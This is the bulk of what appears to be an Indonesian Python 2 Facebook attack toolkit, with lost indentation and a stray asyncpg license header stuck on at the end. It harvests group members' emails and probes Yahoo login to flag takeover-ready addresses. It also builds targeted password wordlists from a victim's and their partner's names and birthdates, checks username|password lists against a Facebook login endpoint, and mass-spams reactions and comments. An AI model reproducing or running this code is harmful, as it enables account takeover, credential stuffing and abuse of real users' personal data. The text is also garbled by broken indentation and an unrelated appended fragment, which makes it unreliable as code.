print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
  a = raw_input("\033[1;91m[+] \033[1;92mFirst name \033[1;97m: ")
  file = open(a+".txt", 'w')
  b=raw_input("\033[1;91m[+] \033[1;92mMiddle name \033[1;97m: ")
  c=raw_input("\033[1;91m[+] \033[1;92mLast name \033[1;97m: ")
  d=raw_input("\033[1;91m[+] \033[1;92mNickname \033[1;97m: ")
  e=raw_input("\033[1;91m[+] \033[1;92mDate of birth >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### MY GROUPS #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
  f = open('out/Grupid.txt','w')
  for p in gud['data']:
   nama = p["name"]
   id = p["id"]
   listgrup.append(id)
   f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable="true"):  # the mutation payload expects the strings "true" / "false"
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
|
fuzzer.py
|
# Copyright (C) 2016-present the asyncpg authors and contributors
# <see AUTHORS file>
#
# This module is part of asyncpg and is released under
